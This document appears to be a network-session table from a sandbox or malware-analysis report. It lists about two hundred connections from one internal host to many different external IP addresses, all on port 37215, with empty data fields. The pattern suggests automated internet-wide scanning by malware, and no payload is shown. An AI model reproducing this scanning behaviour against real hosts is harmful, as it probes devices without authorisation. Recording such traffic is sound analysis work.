                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8247192.168.2.1341850197.204.43.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8248192.168.2.1347490197.92.141.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8249192.168.2.135603641.74.202.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8250192.168.2.135223041.72.197.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8251192.168.2.135886641.94.192.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8252192.168.2.1337610157.172.63.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8253192.168.2.1352762197.141.251.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8254192.168.2.1337496197.153.11.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8255192.168.2.1334176197.249.184.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8256192.168.2.1356576130.64.163.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8257192.168.2.1340532157.20.185.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8258192.168.2.1354208157.100.188.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8259192.168.2.1345376171.27.194.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8260192.168.2.1359676157.93.12.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8261192.168.2.135237259.205.201.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8262192.168.2.133359041.138.141.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8263192.168.2.1343504197.94.210.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8264192.168.2.134358843.122.191.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8265192.168.2.1346026157.112.255.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8266192.168.2.1345454197.190.215.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8267192.168.2.1350258157.246.103.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8268192.168.2.1344576197.155.196.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8269192.168.2.133854673.244.73.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8270192.168.2.133676641.70.248.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8271192.168.2.1359382197.200.174.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8272192.168.2.1336874157.23.252.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8273192.168.2.133576641.142.37.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8274192.168.2.1337458159.160.184.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8275192.168.2.1332784157.233.0.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8276192.168.2.1342336157.162.127.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8277192.168.2.1354238178.194.76.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8278192.168.2.1356064197.54.21.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8279192.168.2.134960441.125.35.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8280192.168.2.134072641.192.24.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8281192.168.2.1339594197.15.209.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8282192.168.2.135228841.243.225.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8283192.168.2.1345446197.153.22.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8284192.168.2.1359360205.179.218.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8285192.168.2.1337600197.218.31.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8286192.168.2.1345286197.9.54.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8287192.168.2.1343954192.244.133.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8288192.168.2.1357346197.57.98.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8289192.168.2.134596041.153.23.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8290192.168.2.1338844157.33.199.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8291192.168.2.1342050157.152.184.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8292192.168.2.1339612197.75.200.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8293192.168.2.133849641.190.133.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8294192.168.2.1349788197.192.245.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8295192.168.2.1360268157.139.28.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8296192.168.2.1344580212.81.62.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8297192.168.2.1342526157.117.81.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8298192.168.2.1332984219.29.84.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8299192.168.2.1335440197.176.203.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8300192.168.2.1340930157.131.31.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8301192.168.2.133673641.131.10.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8302192.168.2.1351014197.197.99.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8303192.168.2.1334412197.229.178.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8304192.168.2.1358016157.218.189.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8305192.168.2.135004295.36.90.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8306192.168.2.1333110197.127.40.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8307192.168.2.1349586197.183.18.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8308192.168.2.1347188170.165.200.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8309192.168.2.1340952197.233.10.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8310192.168.2.13459724.207.96.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8311192.168.2.1340704197.200.235.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8312192.168.2.1334100197.12.10.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8313192.168.2.134450649.161.246.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8314192.168.2.1337812139.117.41.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8315192.168.2.1347484222.17.64.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8316192.168.2.1344892160.114.228.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8317192.168.2.1333072157.224.103.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8318192.168.2.1348350197.29.253.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8319192.168.2.134095041.78.135.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8320192.168.2.1344488157.60.191.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8321192.168.2.1360454119.194.82.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8322192.168.2.1350630137.4.41.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8323192.168.2.1352482104.23.140.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8324192.168.2.1360752157.171.206.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8325192.168.2.1336878157.44.41.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8326192.168.2.1333658157.182.179.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8327192.168.2.133305671.6.245.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8328192.168.2.1355098197.188.128.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8329192.168.2.1334814157.171.228.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8330192.168.2.1343336157.65.234.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8331192.168.2.135945041.183.138.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8332192.168.2.1341702157.225.170.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8333192.168.2.134067241.75.17.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8334192.168.2.1352158157.194.73.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8335192.168.2.135041641.4.164.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8336192.168.2.1341212103.162.69.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8337192.168.2.1359460157.174.10.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8338192.168.2.135618692.186.97.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8339192.168.2.1346000157.215.138.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8340192.168.2.1344870157.80.202.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8341192.168.2.1344980157.17.249.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8342192.168.2.1335942157.138.174.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8343192.168.2.1356934157.77.213.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8344192.168.2.1343774157.57.9.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8345192.168.2.1337774157.252.48.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8346192.168.2.1352296157.126.62.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8347192.168.2.1348806157.37.44.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8348192.168.2.1343374197.76.26.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8349192.168.2.133491053.171.46.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8350192.168.2.135447054.189.9.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8351192.168.2.135367841.41.57.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8352192.168.2.1342482157.39.202.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8353192.168.2.1359276197.148.250.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8354192.168.2.1348062197.24.157.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8355192.168.2.1354110157.209.5.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8356192.168.2.1337038197.250.83.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8357192.168.2.1339388197.198.20.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8358192.168.2.1349122197.238.223.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8359192.168.2.1341920150.52.136.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8360192.168.2.1334290197.150.54.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8361192.168.2.1333860157.246.249.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8362192.168.2.13382461.148.228.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8363192.168.2.1353492197.162.171.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8364192.168.2.135553241.108.23.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8365192.168.2.1360850157.15.214.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8366192.168.2.13502029.159.73.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8367192.168.2.1337424197.131.44.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8368192.168.2.1348488197.254.72.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8369192.168.2.1340074197.173.3.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8370192.168.2.1354074154.217.66.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8371192.168.2.134947041.255.112.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8372192.168.2.133346241.128.191.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8373192.168.2.1359090206.38.183.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8374192.168.2.1357734197.230.151.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8375192.168.2.1354680119.113.133.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8376192.168.2.1345974167.6.211.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8377192.168.2.133473458.200.183.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8378192.168.2.1349574157.46.39.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8379192.168.2.1355874157.7.220.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8380192.168.2.1332972197.83.1.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8381192.168.2.1355172157.217.186.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8382192.168.2.1344488157.0.188.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8383192.168.2.133832844.165.182.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8384192.168.2.1335344157.233.99.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8385192.168.2.1346378157.63.61.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8386192.168.2.1340872197.10.80.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8387192.168.2.1343728157.239.247.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8388192.168.2.1359126132.88.179.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8389192.168.2.1340842157.24.223.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8390192.168.2.1333170157.185.88.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8391192.168.2.1348838157.48.154.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8392192.168.2.1356212157.119.246.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8393192.168.2.133403641.71.93.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8394192.168.2.135397441.13.250.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8395192.168.2.1349858157.240.226.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8396192.168.2.1349548157.9.62.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8397192.168.2.1352690218.30.27.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8398192.168.2.135093641.18.186.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8399192.168.2.135779841.220.194.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8400192.168.2.1349750220.34.61.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8401192.168.2.1336652138.91.190.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8402192.168.2.1360410197.196.217.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8403192.168.2.1335448197.237.81.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8404192.168.2.135954241.33.216.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8405192.168.2.1347744153.187.155.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8406192.168.2.1343262157.230.234.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8407192.168.2.1360028197.146.206.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8408192.168.2.1343612197.158.211.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8409192.168.2.1332860157.29.129.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8410192.168.2.1352610207.41.246.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8411192.168.2.135911241.64.226.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8412192.168.2.1336348176.224.105.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8413192.168.2.1336828197.129.125.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8414192.168.2.1338118165.158.30.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8415192.168.2.1333454157.201.169.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8416192.168.2.1349322197.121.90.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8417192.168.2.1349120157.112.95.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8418192.168.2.1340212157.216.245.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8419192.168.2.1337878197.155.0.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8420192.168.2.1333672197.76.40.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8421192.168.2.1339678197.104.153.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8422192.168.2.134373441.164.90.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8423192.168.2.1333224197.223.251.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8424192.168.2.1347312157.66.32.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8425192.168.2.1354850197.172.250.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8426192.168.2.133502441.253.79.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8427192.168.2.1336846197.131.77.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8428192.168.2.134429641.207.255.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8429192.168.2.1338654157.74.17.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8430192.168.2.133477286.128.187.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8431192.168.2.133439844.147.71.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8432192.168.2.133787241.137.206.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8433192.168.2.134841041.66.172.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8434192.168.2.1352690109.174.235.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8435192.168.2.1340724157.239.88.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8436192.168.2.1359466157.156.6.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8437192.168.2.1349366197.108.72.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8438192.168.2.1344242197.136.133.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8439192.168.2.135700641.168.174.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8440192.168.2.136069041.205.146.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8441192.168.2.1337430197.118.78.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8442192.168.2.13461245.129.194.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8443192.168.2.135574041.1.36.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8444192.168.2.1343988157.121.232.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8445192.168.2.134487241.170.193.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8446192.168.2.134813641.129.200.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8447192.168.2.135615841.244.119.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8448192.168.2.1348850179.52.138.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8449192.168.2.135092041.208.100.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8450192.168.2.1345270157.64.33.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8451192.168.2.134371241.72.23.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8452192.168.2.133632441.177.119.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8453192.168.2.1335934157.217.234.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8454192.168.2.133705641.97.68.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8455192.168.2.1355490157.36.231.3537215
                                                  TimestampBytes transferredDirectionData


